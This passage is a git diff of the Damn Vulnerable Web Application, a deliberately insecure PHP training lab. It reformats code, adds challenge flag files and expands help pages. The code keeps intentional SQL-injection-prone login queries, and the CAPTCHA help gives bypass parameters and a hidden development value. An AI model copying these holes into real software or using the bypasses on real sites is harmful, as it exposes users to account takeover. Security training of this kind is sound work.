' . $DBMS_errorFunc ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' ); } // MySQL PDO Prepared Statements (for impossible levels) - $db = new PDO('mysql:host='.$_DVWA[ 'db_server' ].';dbname='.$_DVWA[ 'db_database' ].';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]); + $db = new PDO('mysql:host=' . $_DVWA[ 'db_server' ].';dbname=' . $_DVWA[ 'db_database' ].';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); } - elseif ( $DBMS == 'PGSQL' ) { + elseif( $DBMS == 'PGSQL' ) { //$dbconn = pg_connect("host={$_DVWA[ 'db_server' ]} dbname={$_DVWA[ 'db_database' ]} user={$_DVWA[ 'db_user' ]} password={$_DVWA[ 'db_password' ])}" //or die( $DBMS_connError ); dvwaMessagePush( 'PostgreSQL is not yet fully supported.' ); dvwaPageReload(); } else { - die ( 'Unknown $DBMS selected' ); + die ( "Unknown {$DBMS} selected." ); } } @@ -535,18 +540,23 @@ function tokenField() { # Return a field for the (CSRF) token // Setup Functions -- -$PHPUploadPath = realpath( getcwd() )."/hackable/uploads/"; -$PHPIDSPath = realpath( getcwd() )."/external/phpids/0.6/lib/IDS/tmp/"; -$phpSafeMode = 'PHP safe mode: ' . ( ini_get( 'safe_mode' ) ? 'Enabled' : 'Disabled' ) . ''; // DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0 -$phpDisplayErrors = 'PHP display errors: '.( ini_get( 'display_errors' ) ? 'Enabled (Easy Mode!)' : 'Disabled' ); // Verbose error messages (e.g. full path disclosure) -$phpURLInclude = 'PHP allow URL include: '.( ini_get( 'allow_url_include' ) ? 'Enabled' : 'Disabled' ) . ''; // RFI -$phpURLFopen = 'PHP allow URL fopen: '.( ini_get( 'allow_url_fopen' ) ? 'Enabled' : 'Disabled' ) . ''; // RFI -$phpMagicQuotes = 'PHP magic quotes: ' . ( ini_get( 'magic_quotes_gpc' ) ? 'Enabled(*)' : 'Disabled' ) . ''; // DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0 -$DVWARecaptcha = 'reCAPTCHA key: ' . ( ( isset( $_DVWA[ 'recaptcha_public_key' ] ) && $_DVWA[ 'recaptcha_public_key' ] != '' ) ? $_DVWA[ 'recaptcha_public_key' ] : 'Missing(*)' ) . ''; -$DVWAUploadsWrite = 'Writable '.$PHPUploadPath.': ' . ( is_writable( $PHPUploadPath ) ? 'Yes' : 'No(*)' ) . ''; // File Upload -$DVWAPHPWrite = 'Writable '.$PHPIDSPath.': ' . ( is_writable( $PHPIDSPath ) ? 'Yes' : 'No(*)' ) . ''; // PHPIDS +$PHPUploadPath = realpath( getcwd() ) . "/hackable/uploads/"; +$PHPIDSPath = realpath( getcwd() ) . "/external/phpids/" . dvwaPhpIdsVersionGet() . "/lib/IDS/tmp/phpids_log.txt"; + +$phpDisplayErrors = 'PHP function display_errors: ' . ( ini_get( 'display_errors' ) ? 'Enabled (Easy Mode!)' : 'Disabled' ); // Verbose error messages (e.g. full path disclosure) +$phpSafeMode = 'PHP function safe_mode: Enabled' : 'success">Disabled' ) . ''; // DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0 +$phpMagicQuotes = 'PHP function magic_quotes_gpc: Enabled' : 'success">Disabled' ) . ''; // DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0 +$phpURLInclude = 'PHP function allow_url_include: Enabled' : 'failure">Disabled' ) . ''; // RFI +$phpURLFopen = 'PHP function allow_url_fopen: Enabled' : 'failure">Disabled' ) . ''; // RFI +$phpGD = 'PHP module php-gd: Installed' : 'failure">Missing' ) . ''; // File Upload + +$DVWARecaptcha = 'reCAPTCHA key: ' . $_DVWA[ 'recaptcha_public_key' ] : 'failure">Missing' ) . ''; + +$DVWAUploadsWrite = 'Writable folder ' . $PHPUploadPath . ': Yes)' : 'failure">No' ) . ''; // File Upload +$DVWAPHPWrite = 'Writable file ' . $PHPIDSPath . ': Yes' : 'failure">No' ) . ''; // PHPIDS + $DVWAOS = 'Operating system: ' . ( strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'Windows' : '*nix' ) . ''; -$SERVER_NAME = 'Web Server SERVER_NAME: ' . $_SERVER[ 'SERVER_NAME' ] . ''; // CSRF +$SERVER_NAME = 'Web Server SERVER_NAME: ' . $_SERVER[ 'SERVER_NAME' ] . ''; // CSRF // -- END (Setup Functions) ?> diff --git a/dvwa/includes/dvwaPhpIds.inc.php b/dvwa/includes/dvwaPhpIds.inc.php index 09dc0f9ea..1d7880483 100644 --- a/dvwa/includes/dvwaPhpIds.inc.php +++ b/dvwa/includes/dvwaPhpIds.inc.php @@ -5,11 +5,11 @@ exit; } -define( 'DVWA_WEB_ROOT_TO_PHPIDS', 'external/phpids/'.dvwaPhpIdsVersionGet().'/' ); -define( 'DVWA_WEB_PAGE_TO_PHPIDS', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS ); +define( 'DVWA_WEB_ROOT_TO_PHPIDS', 'external/phpids/' . dvwaPhpIdsVersionGet() . '/' ); +define( 'DVWA_WEB_PAGE_TO_PHPIDS', DVWA_WEB_PAGE_TO_ROOT . DVWA_WEB_ROOT_TO_PHPIDS ); // Add PHPIDS to include path -set_include_path( get_include_path().PATH_SEPARATOR.DVWA_WEB_PAGE_TO_PHPIDS.'lib/' ); +set_include_path( get_include_path() . PATH_SEPARATOR . DVWA_WEB_PAGE_TO_PHPIDS . 'lib/' ); require_once 'IDS/Init.php'; @@ -19,20 +19,19 @@ function dvwaPhpIdsVersionGet() { // PHPIDS Log parsing function function dvwaReadIdsLog() { - $file_array = file(DVWA_WEB_PAGE_TO_PHPIDS_LOG); + $file_array = file( DVWA_WEB_PAGE_TO_PHPIDS_LOG ); $data = ''; - foreach ($file_array as $line_number => $line) { - $line = explode(",", $line); - $line = str_replace("\""," ",$line); + foreach( $file_array as $line_number => $line ) { + $line = explode( ",", $line ); + $line = str_replace( "\"", " ", $line ); - $datetime = $line[1]; + $datetime = $line[1]; $vulnerability = $line[3]; - $variable = urldecode($line[4]); - $request = urldecode($line[5]); - $ip = $line[6]; - + $variable = urldecode($line[4]); + $request = urldecode($line[5]); + $ip = $line[6]; $data .= "
\nDate/Time: {$datetime}
\nVulnerability: {$vulnerability}
\nRequest: " . htmlspecialchars($request) . "
\nVariable: " . htmlspecialchars($variable) . "
\nIP: {$ip}
"; } @@ -41,9 +40,9 @@ function dvwaReadIdsLog() { // Clear PHPIDS log function dvwaClearIdsLog() { - if(isset($_GET['clear_log'])) { - $fp = fopen(DVWA_WEB_PAGE_TO_PHPIDS_LOG, w); - fclose($fp); + if( isset( $_GET[ 'clear_log' ] ) ) { + $fp = fopen( DVWA_WEB_PAGE_TO_PHPIDS_LOG, w ); + fclose( $fp ); dvwaMessagePush( "PHPIDS log cleared" ); dvwaPageReload(); } @@ -51,25 +50,32 @@ function dvwaClearIdsLog() { // Main PHPIDS function function dvwaPhpIdsTrap() { + global $_DVWA; try { + + /* + * 1. Define what to scan + * Please keep in mind what array_merge does and how this might interfer + * with your variables_order settings + */ $request = array( 'REQUEST' => $_REQUEST, - 'GET' => $_GET, - 'POST' => $_POST, - 'COOKIE' => $_COOKIE + 'GET' => $_GET, + 'POST' => $_POST, + 'COOKIE' => $_COOKIE ); - $init = IDS_Init::init( DVWA_WEB_PAGE_TO_PHPIDS.'lib/IDS/Config/Config.ini' ); + $init = IDS_Init::init( DVWA_WEB_PAGE_TO_PHPIDS . 'lib/IDS/Config/Config.ini' ); - $init->config['General']['base_path'] = DVWA_WEB_PAGE_TO_PHPIDS.'lib/IDS/'; - $init->config['General']['use_base_path'] = true; - $init->config['Caching']['caching'] = 'none'; + $init->config[ 'General' ][ 'base_path' ] = DVWA_WEB_PAGE_TO_PHPIDS . 'lib/IDS/'; + $init->config[ 'General' ][ 'use_base_path' ] = true; + $init->config[ 'Caching' ][ 'caching' ] = 'none'; // 2. Initiate the PHPIDS and fetch the results $ids = new IDS_Monitor( $request, $init ); $result = $ids->run(); - if(!$result->isEmpty()) { + if( !$result->isEmpty() ) { require_once 'IDS/Log/File.php'; require_once 'IDS/Log/Composite.php'; @@ -78,20 +84,17 @@ function dvwaPhpIdsTrap() { $compositeLog->execute($result); - echo 'Hacking attempt detected and logged.'; + echo 'Hacking attempt detected and logged.
Have a nice day.'; + + if( $_DVWA[ 'default_phpids_verbose' ] == 'true' ) + echo $result; - // echo $result; exit; } - } catch (Exception $e) { - /* - * something went terribly wrong - maybe the - * filter rules weren't found? - */ - printf( - 'An error occured: %s', - $e->getMessage() - ); + } + catch (Exception $e) { + // Something went terribly wrong - maybe the filter rules weren't found? + printf( 'An error occured: %s', $e->getMessage() ); } } diff --git a/hackable/flags/fi.php b/hackable/flags/fi.php new file mode 100644 index 000000000..a9a29c42a --- /dev/null +++ b/hackable/flags/fi.php @@ -0,0 +1,24 @@ + + +1.) Bond. James Bond + +
\n"; + +$line3 = "3.) Romeo, Romeo! wherefore art thou Romeo?"; +$line3 = "--LINE MISSING--"; +echo $line3 . "\n\n

\n"; + +$line4 = "NC4pI" . "FRoZSBwb29s" . "IG9uIH" . "RoZSByb29mIG1" . "1c3QgaGF" . "2ZSBh" . "IGxlY" . "Wsu"; +echo base64_decode( $line4 ); + +?> + + diff --git a/ids_log.php b/ids_log.php index bde7bbb43..d01e081fc 100644 --- a/ids_log.php +++ b/ids_log.php @@ -1,15 +1,15 @@

PHPIDS Log

-

". dvwaReadIdsLog() ."

+

" . dvwaReadIdsLog() . "



-
+ - ".dvwaClearIdsLog()." - -"; + " . dvwaClearIdsLog() . " +"; dvwaHtmlEcho( $page ); diff --git a/index.php b/index.php index c7c45915b..f672abeb9 100644 --- a/index.php +++ b/index.php @@ -1,12 +1,12 @@

WARNING!

-

Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommend using a virtual machine (such as ".dvwaExternalLinkUrlGet( 'https://www.virtualbox.org/','VirtualBox' )." or ".dvwaExternalLinkUrlGet( 'https://www.vmware.com/','VMware' )."), which is set to NAT networking mode. Inside a guest machine, you can downloading and install ".dvwaExternalLinkUrlGet( 'https://www.apachefriends.org/en/xampp.html','XAMPP' )." for the web server and database.

+

Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommend using a virtual machine (such as " . dvwaExternalLinkUrlGet( 'https://www.virtualbox.org/','VirtualBox' ) . " or " . dvwaExternalLinkUrlGet( 'https://www.vmware.com/','VMware' ) . "), which is set to NAT networking mode. Inside a guest machine, you can downloading and install " . dvwaExternalLinkUrlGet( 'https://www.apachefriends.org/en/xampp.html','XAMPP' ) . " for the web server and database.


Disclaimer

We do not take responsibility for the way in which any one uses this application (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.

@@ -37,7 +37,7 @@

DVWA aims to cover the most commonly seen vulnerabilities found in today's web applications. However there are plenty of other issues with web applications. Should you wish to explore any additional attack vectors, or want more difficult challenges, you may wish to look into the following other projects:

diff --git a/instructions.php b/instructions.php index b89b071c6..8d17c3770 100644 --- a/instructions.php +++ b/instructions.php @@ -1,12 +1,12 @@ array( 'legend' => 'PDF Guide', 'file' => 'docs/pdf.html' ), 'changelog' => array( 'legend' => 'Change Log', 'file' => 'CHANGELOG.md' ), 'copying' => array( 'legend' => 'Copying', 'file' => 'COPYING.txt' ), - 'PHPIDS-license' => array( 'legend' => 'PHPIDS License', 'file' => DVWA_WEB_PAGE_TO_PHPIDS.'LICENSE' ), + 'PHPIDS-license' => array( 'legend' => 'PHPIDS License', 'file' => DVWA_WEB_PAGE_TO_PHPIDS . 'LICENSE' ), ); $selectedDocId = isset( $_GET[ 'doc' ] ) ? $_GET[ 'doc' ] : ''; @@ -52,10 +52,9 @@ function urlReplace( $matches ) { {$docMenuHtml} - {$instructions} + {$instructions} - -"; +"; dvwaHtmlEcho( $page ); diff --git a/login.php b/login.php index dcd69ca09..d0ca8bc22 100644 --- a/login.php +++ b/login.php @@ -1,7 +1,7 @@ Need to run 'setup.php'." ); - dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT.'setup.php' ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' ); } $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';"; @@ -35,10 +35,10 @@ if( $result && mysql_num_rows( $result ) == 1 ) { // Login Successful... dvwaMessagePush( "You have logged in as '{$user}'" ); dvwaLogin( $user ); - dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT.'index.php' ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'index.php' ); } - // Login failed + // Login failed dvwaMessagePush( 'Login failed' ); dvwaRedirect( 'login.php' ); } @@ -46,14 +46,13 @@ $messagesHtml = messagesPopAllToHtml(); Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 -Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... -Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past +Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... +Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past // Anti-CSRF generateSessionToken(); echo " - @@ -64,20 +63,26 @@ Login :: Damn Vulnerable Web Application (DVWA) v" . dvwaVersionGet() . " - + -
+
+ +

-

+


+
+ +
+
@@ -87,16 +92,16 @@
+

- ".tokenField()." + " . tokenField() . "
-
{$messagesHtml} @@ -110,15 +115,19 @@

- + +
+ +
+ +

" . dvwaExternalLinkUrlGet( 'http://www.dvwa.co.uk/', 'Damn Vulnerable Web Application (DVWA)' ) . " is a RandomStorm OpenSource project.

-

Damn Vulnerable Web Application (DVWA) is a RandomStorm OpenSource project

+
-
+
- -"; +"; ?> diff --git a/logout.php b/logout.php index 145982db6..e02be1438 100644 --- a/logout.php +++ b/logout.php @@ -1,7 +1,7 @@ Security level is currently: $securityLevel.

"; } - $securityOptionsHtml .= ""; + $securityOptionsHtml .= ""; } $phpIdsHtml = 'PHPIDS is currently: '; @@ -72,9 +72,16 @@ // Anti-CSRF generateSessionToken(); +// Able to write to the PHPIDS log file? +$WarningHtml = ''; +if( !is_writable( $PHPIDSPath ) ) { + $WarningHtml .= "

Cannot write to the PHPIDS log file: ${PHPIDSPath}
"; +} + + $page[ 'body' ] .= "
-

DVWA Security

+

DVWA Security


Security Level

@@ -89,13 +96,13 @@
  • Medium - This setting is mainly to give an example to the user of bad security practices, where the developer has tried but failed to secure an application. It also acts as a challenge to users to refine their exploitation techniques.
  • High - This option is an extension to the medium difficulty, with a mixture of harder or alternative bad practices to attempt to secure the code. The vulnerability may not allow the same extent of the exploitation, similar in various Capture The Flags (CTFs) competitions.
  • Impossible - This level should be secure against all vulnerabilities. It is used to compare the vulnerable source code to the secure source code.
    - Priority to DVWA v1.9, this level was known as 'high'.
    • + Priority to DVWA v1.9, this level was known as 'high'. - ".tokenField()." + " . tokenField() . "
    @@ -103,15 +110,15 @@

    PHPIDS

    -

    ".dvwaExternalLinkUrlGet( 'https://github.com/PHPIDS/PHPIDS', 'PHPIDS' )." v".dvwaPhpIdsVersionGet()." (PHP-Intrusion Detection System) is a security layer for PHP based web applications.

    + {$WarningHtml} +

    " . dvwaExternalLinkUrlGet( 'https://github.com/PHPIDS/PHPIDS', 'PHPIDS' ) . " v" . dvwaPhpIdsVersionGet() . " (PHP-Intrusion Detection System) is a security layer for PHP based web applications.

    PHPIDS works by filtering any user supplied input against a blacklist of potentially malicious code. It is used in DVWA to serve as a live example of how Web Application Firewalls (WAFs) can help improve security and in some cases how WAFs can be circumvented.

    You can enable PHPIDS across this site for the duration of your session.

    {$phpIdsHtml}

    [\">Simulate attack] - [View IDS log] -
    -"; +"; dvwaHtmlEcho( $page ); diff --git a/setup.php b/setup.php index aa72fcb54..9faffc6fd 100644 --- a/setup.php +++ b/setup.php @@ -1,12 +1,12 @@ -

    Database Setup

    +

    Database Setup

    Click on the 'Create / Reset Database' button below to create or reset your database.
    If you get an error make sure you have the correct user credentials in: " . realpath( getcwd() ) . "/config/config.inc.php

    @@ -45,34 +45,34 @@

    Setup Check

    {$DVWAOS}
    - Backend database: ".$DBMS."
    - PHP version: v".phpversion()."
    + Backend database: {$DBMS}
    + PHP version: " . phpversion() . "

    {$SERVER_NAME}

    - {$phpSafeMode}
    {$phpDisplayErrors}
    + {$phpSafeMode}
    {$phpURLInclude}
    {$phpURLFopen}
    {$phpMagicQuotes}
    + {$phpGD}

    {$DVWARecaptcha}

    {$DVWAUploadsWrite}
    {$DVWAPHPWrite}

    - Status with \"(*)\" indicate there could be possible issue(s) with a certain modules.
    + Status in red, indicate there will be an issue when trying to complete some modules.



    - ".tokenField()." + " . tokenField() . "

    - -"; +"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/brute/help/help.php b/vulnerabilities/brute/help/help.php index 5d2f3cd86..ebe4c6821 100644 --- a/vulnerabilities/brute/help/help.php +++ b/vulnerabilities/brute/help/help.php @@ -5,13 +5,58 @@
    -

    Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

    +

    About

    +

    Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. + A common approach is to repeatedly try guesses for the password.

    -

    Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, given and family names, any too short password - (usually thought to be 6 or 7 characters or less), or any password meeting a too restrictive and so predictable, pattern (eg, alternating vowels and consonants).

    +

    Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, family names, any too short password + (usually thought to be less than 6 or 7 characters), or predictable patterns + (e.g. alternating vowels and consonants, which is known as leetspeak, so "password" becomes "p@55w0rd").

    + +

    Creating a targeted wordlists, which is generated towards the target, often gives the highest success rate. There are public tools out there that will create a dictionary + based on a combination of company websites, personal social networks and other common information (such as birthdays or year of graduation).

    A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always - be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords.

    + be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords + making the attack time longer.

    + +

    + +

    Objective

    +

    Your goal is to get the administrator’s password by brute forcing. Bonus points for getting the other four user passwords!

    + +

    + +

    Low Level

    +

    The developer has completely missed out any protections methods, allowing for anyone to try as many times as they wish, to login to any user without any repercussions.

    + +
    + +

    Medium Level

    +

    This stage adds a sleep on the failed login screen. This mean when you login incorrectly, there will be an extra two second wait before the page is visible.

    + +

    This will only slow down the amount of requests which can be processed a minute, making it longer to brute force.

    + +
    + +

    High Level

    +

    There has been an "anti Cross-Site Request Forgery (CSRF) token" used. There is a old myth that this protection will stop brute force attacks. This is not the case. + This level also extends on the medium level, by waiting when there is a failed login but this time it is a random amount of time between two and four seconds. + The idea of this is to try and confuse any timing predictions.

    + +

    Using a form could have a similar effect as a CSRF token.

    + +
    + +

    Impossible Level

    +

    Brute force (and user enumeration) should not be possible in the impossible level. The developer has added a "lock out" feature, where if there are five bad logins within + the last 15 minutes, the locked out user cannot log in.

    + +

    If the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. This will make it impossible to know + if there is a valid account on the system, with that password, and if the account is locked.

    + +

    This can cause a "Denial of Service" (DoS), by having someone continually trying to login to someone's account. + This level would need to be extended by blacklisting the attacker (e.g. IP address, country, user-agent).
    @@ -20,5 +65,5 @@
    -

    Reference: https://en.wikipedia.org/wiki/Password_cracking

    +

    Reference:

    diff --git a/vulnerabilities/brute/index.php b/vulnerabilities/brute/index.php index 9bceadf38..76a950860 100644 --- a/vulnerabilities/brute/index.php +++ b/vulnerabilities/brute/index.php @@ -1,17 +1,18 @@ @@ -37,14 +39,13 @@

    Login

    -
    + Username:

    Password:


    - -"; + \n"; if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -56,12 +57,11 @@

    More Information

    -
    -"; +\n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/brute/source/high.php b/vulnerabilities/brute/source/high.php index ff69d2528..1d6c70628 100644 --- a/vulnerabilities/brute/source/high.php +++ b/vulnerabilities/brute/source/high.php @@ -15,14 +15,15 @@ $pass = mysql_real_escape_string( $pass ); $pass = md5( $pass ); - $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';"; + // Check database + $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); - // Login Successful + // Login successful $html .= "

    Welcome to the password protected area {$user}

    "; $html .= ""; } @@ -31,6 +32,8 @@ sleep( rand( 0, 3 ) ); $html .= "

    Username and/or password incorrect.
    "; } + + mysql_close(); } // Generate Anti-CSRF token diff --git a/vulnerabilities/brute/source/impossible.php b/vulnerabilities/brute/source/impossible.php index 30350e5f0..6e46238c7 100644 --- a/vulnerabilities/brute/source/impossible.php +++ b/vulnerabilities/brute/source/impossible.php @@ -1,75 +1,93 @@ ' . mysql_error() . '' ); + // Check the database (Check user information) + $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); + $row = $data->fetch(); - if( $result && mysql_num_rows( $result ) == 1 && mysql_result( $result, 0, "failed_login" ) >= $total_failed_login ) { - // User locked out. Note, this method will allow for user enumeration! - // $html .= "

    This account has been locked due to too many incorrect logins.
    "; + // Check to see if the user has been locked out. + if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) { + // User locked out. Note, using this method would allow for user enumeration! + //$html .= "

    This account has been locked due to too many incorrect logins.
    "; - $last_login = mysql_result( $result, 0, "last_login" ); + // Calculate when the user would be allowed to login again + $last_login = $row[ 'last_login' ]; $last_login = strtotime( $last_login ); - $timeout = strtotime( "${$last_login} +{$lockout_time} minutes" ); + $timeout = strtotime( "{$last_login} +{$lockout_time} minutes" ); $timenow = strtotime( "now" ); - $account_locked = false; - if( $timeout < $timenow ) + // Check to see if enough time has passed, if it hasn't locked the account + if( $timenow > $timeout ) $account_locked = true; } - $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass' AND failed_login < {$total_failed_login} LIMIT 1;"; - $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); + // Check the database (if username matches the password) + $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR); + $data->bindParam( ':password', $pass, PDO::PARAM_STR ); + $data->execute(); + $row = $data->fetch(); - if( $result && mysql_num_rows( $result ) == 1 && $account_locked == false) { + // If its a valid login... + if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { // Get users details - $avatar = mysql_result( $result, 0, "avatar" ); - $failed_login = mysql_result( $result, 0, "failed_login" ); - $last_login = mysql_result( $result, 0, "last_login" ); + $avatar = $row[ 'avatar' ]; + $failed_login = $row[ 'failed_login' ]; + $last_login = $row[ 'last_login' ]; - // Login Successful + // Login successful $html .= "

    Welcome to the password protected area {$user}

    "; $html .= ""; + // Had the account been locked out since last login? if( $failed_login >= $total_failed_login ) { $html .= "

    Warning: Someone might of been brute forcing your account.

    "; $html .= "

    Number of login attempts: {$failed_login}.
    Last login attempt was at: ${last_login}.

    "; } // Reset bad login count - $insert = "UPDATE `users` SET `failed_login` = '0' WHERE user='$user' LIMIT 1;"; - $result = @mysql_query( $insert ); + $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); } else { // Login failed sleep( rand( 2, 4 ) ); + // Give the user some feedback $html .= "

    Username and/or password incorrect.

    Alternative, the account has been locked because of too many failed logins.
    If this is the case, please try again in {$lockout_time} minutes.
    "; - $query = "UPDATE `users` SET `failed_login` = failed_login + 1 WHERE user='$user' LIMIT 1;"; - $result = @mysql_query( $query ); + // Update bad login count + $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); } - $query = "UPDATE `users` SET `last_login` = now() WHERE user='$user' LIMIT 1;"; - $result = @mysql_query( $query ); + // Set the last login time + $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); } // Generate Anti-CSRF token diff --git a/vulnerabilities/brute/source/low.php b/vulnerabilities/brute/source/low.php index 18ebb1a03..3ab2988aa 100644 --- a/vulnerabilities/brute/source/low.php +++ b/vulnerabilities/brute/source/low.php @@ -1,19 +1,22 @@ ' . mysql_error() . '' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); - // Login Successful + // Login successful $html .= "

    Welcome to the password protected area {$user}

    "; $html .= ""; } @@ -21,6 +24,8 @@ // Login failed $html .= "

    Username and/or password incorrect.
    "; } + + mysql_close(); } ?> diff --git a/vulnerabilities/brute/source/medium.php b/vulnerabilities/brute/source/medium.php index f42638e58..195b377df 100644 --- a/vulnerabilities/brute/source/medium.php +++ b/vulnerabilities/brute/source/medium.php @@ -10,14 +10,15 @@ $pass = mysql_real_escape_string( $pass ); $pass = md5( $pass ); - $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';"; + // Check the database + $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); - // Login Successful + // Login successful $html .= "

    Welcome to the password protected area {$user}

    "; $html .= ""; } @@ -26,6 +27,8 @@ sleep( 2 ); $html .= "

    Username and/or password incorrect.
    "; } + + mysql_close(); } ?> diff --git a/vulnerabilities/captcha/help/help.php b/vulnerabilities/captcha/help/help.php index 46cd28bd7..aa9dfaec8 100644 --- a/vulnerabilities/captcha/help/help.php +++ b/vulnerabilities/captcha/help/help.php @@ -1,32 +1,55 @@
    -

    Help - Insecure CAPTCHA (Intro to Logic Flaws)

    +

    Help - Insecure CAPTCHA

    -

    A CAPTCHA is a program that can tell whether its user is a human or a computer. You've probably seen - them - colorful images with distorted text at the bottom of Web registration forms. CAPTCHAs are used by many websites to prevent abuse from +

    About

    +

    A is a program that can tell whether its user is a human or a computer. You've probably seen + them - colourful images with distorted text at the bottom of Web registration forms. CAPTCHAs are used by many websites to prevent abuse from "bots", or automated programs usually written to generate spam. No computer program can read distorted text as well as humans can, so bots cannot navigate sites protected by CAPTCHAs.

    -

    CAPTCHAs are often used to protect sensative functionality from automated bots. Such functionality typically includes user registration and changes, - password changes, and posting content. In this example, the CAPTCHA is guarding the change password functionality for the Administrator account. This provides +

    CAPTCHAs are often used to protect sensitive functionality from automated bots. Such functionality typically includes user registration and changes, + password changes, and posting content. In this example, the CAPTCHA is guarding the change password functionality for the user account. This provides limited protection from CSRF attacks as well as automated bot guessing.

    +

    + +

    Objective

    +

    Your aim, change the current user's password in a automated manner because of the poor CAPTCHA system.

    + +

    + +

    Low Level

    The issue with this CAPTCHA is that it is easily bypassed. The developer has made the assumption that all users will progress through screen 1, complete the CAPTCHA, and then - move on to the next screen where the password is actually updated. By submitting the new password directly to the change page, the user may bypass the CAPTCHA.

    + move on to the next screen where the password is actually updated. By submitting the new password directly to the change page, the user may bypass the CAPTCHA system.

    +

    The parameters required to complete this challenge in low security would be similar to the following:

    -

    step=2&password_new=password&password_conf=password&Change=Change

    + 
    Spoiler: ?step=2&password_new=password&password_conf=password&Change=Change.
    + +
    + +

    Medium Level

    +

    The developer has attempted to place state around the session and keep track of whether the user successfully completed the + CAPTCHA prior to submitting data. Because the state variable (Spoiler: passed_captcha) is on the client side, + it can also be manipulated by the attacker like so:

    + 
    Spoiler: ?step=2&password_new=password&password_conf=password&passed_captcha=true&Change=Change.
    + +
    -

    For the medium level challenge, the developer has attempted to place state around the session and keep track of whether the user successfully completed the - CAPTCHA prior to submitting data. Because the state variable ("passed_captcha") is on the client side, it can also be manipulated by the attacker like so:

    -

    step=2&password_new=password&password_conf=password&passed_captcha=true&Change=Change

    +

    High Level

    +

    There has been development code left in, which was never removed in production. It is possible to mimic the development values, to allow + invalid values in be placed into the CAPTCHA field.

    +

    You will need to spoof your user-agent (Spoiler: reCAPTCHA) as well as use the CAPTCHA value of + (Spoiler: hidd3n_valu3) to skip the check.

    -

    In the high level, *coming soon*.

    +
    -

    In the impossible level, the developer has removed all avenues of attack. The process has been simplified so that data and CAPTCHA verification occurs in one - single step. Alternatively, the developer could have moved the state variable server side, or NONCE'd the form.

    +

    Impossible Level

    +

    In the impossible level, the developer has removed all avenues of attack. The process has been simplified so that data and CAPTCHA verification occurs in one + single step. Alternatively, the developer could have moved the state variable server side (from the medium level), so the user cannot alter it.
    @@ -35,5 +58,5 @@
    -

    Reference: http://www.captcha.net/

    +

    Reference:

